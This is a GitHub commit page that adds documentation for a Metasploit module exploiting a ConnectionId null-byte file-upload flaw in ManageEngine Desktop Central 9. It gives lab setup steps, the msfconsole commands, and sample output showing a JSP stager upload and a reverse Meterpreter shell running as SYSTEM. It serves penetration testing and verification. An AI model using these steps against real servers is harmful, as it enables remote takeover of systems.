Skip to content

Commit 9f892c5

Browse files
committed
land rapid7#8244 docs for manageengine_connectionid_write
2 parents 524bbd7 + 5f92185 commit 9f892c5

File tree

1 file changed

+49
-0
lines changed

1 file changed

+49
-0
lines changed
Lines changed: 49 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,49 @@
1+
## Description
2+
3+
This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. This exploit was successfully tested on version 9, build 90109 and build 91084.
4+
5+
**NOTE:** By default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file `rdslog0.txt`.
6+
7+
## ManageEngine Desktop Central 9
8+
9+
Desktop Central is integrated desktop and mobile device management software that helps in managing servers, laptops, desktops, smartphones, and tablets from a central location. It is used for automating your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more. It supports managing both Windows, Mac and Linux operating systems.
10+
11+
## Prerequisites
12+
13+
1. Start a Windows VM (such as Win 7)
14+
2. Install a vulnerable version of ManageEngine Desktop Central. This exploit was tested on Build [90109](http://archives.manageengine.com/desktop-central/90109/) and [91084](http://archives.manageengine.com/desktop-central/91084/).
15+
3. After installation, verify that the server is working by visiting it with a browser. Depending on the version, the server port may be 8020, or 8040.
16+
17+
## Verification Steps
18+
19+
1. Do: ```use exploit/windows/http/manageengine_connectionid_write```
20+
2. Do: ```set RHOST [IP]```
21+
3. Do: ```check```
22+
4. Do: ```run```
23+
24+
## Sample Output
25+
26+
```
27+
$ msfconsole
28+
msf > use exploit/windows/http/manageengine_connectionid_write
29+
msf exploit(manageengine_connectionid_write) > set rhost 192.168.1.188
30+
rhost => 192.168.1.188
31+
msf exploit(manageengine_connectionid_write) > check
32+
[*] 192.168.1.188:8020 - The target appears to be vulnerable.
33+
msf exploit(manageengine_connectionid_write) > exploit
34+
35+
[*] Started reverse handler on 192.168.1.64:4444
36+
[*] Creating JSP stager
37+
[*] Uploading JSP stager test.jsp...
38+
[*] Executing stager...
39+
[*] Sending stage (885806 bytes) to 192.168.1.188
40+
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.188:61023) at 2017-04-15 17:35:29 -0500
41+
[+] Deleted ../webapps/DesktopCentral/jspf/test.jsp
42+
43+
meterpreter > pwd
44+
C:\ManageEngine\DesktopCentral_Server\bin
45+
meterpreter > getuid
46+
Server username: NT AUTHORITY\SYSTEM
47+
meterpreter >
48+
49+
```

0 commit comments

Comments
 (0)